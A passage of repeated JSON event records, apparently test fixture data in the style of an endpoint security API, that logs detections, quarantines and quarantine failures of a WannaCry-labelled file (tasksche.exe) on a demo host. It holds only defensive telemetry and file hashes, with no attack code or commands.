pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 